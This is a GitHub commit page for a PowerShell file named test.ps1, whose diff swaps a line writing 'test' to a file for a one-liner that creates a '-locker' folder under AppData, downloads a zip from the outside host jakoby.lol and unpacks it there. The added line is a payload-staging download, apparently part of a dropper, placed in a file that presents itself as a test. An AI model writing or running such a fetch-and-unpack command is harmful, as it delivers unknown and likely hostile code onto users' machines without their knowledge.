Update test.ps1

This commit is contained in:
I-Am-Jakoby 2022-12-23 02:08:50 -06:00 committed by GitHub
parent d176980b68
commit a5e4b0df2a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1 +1 @@
echo "test" > C:\test.txt
$D="$env:appdata\-locker";iwr -Uri "jakoby.lol/qee" -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D -Force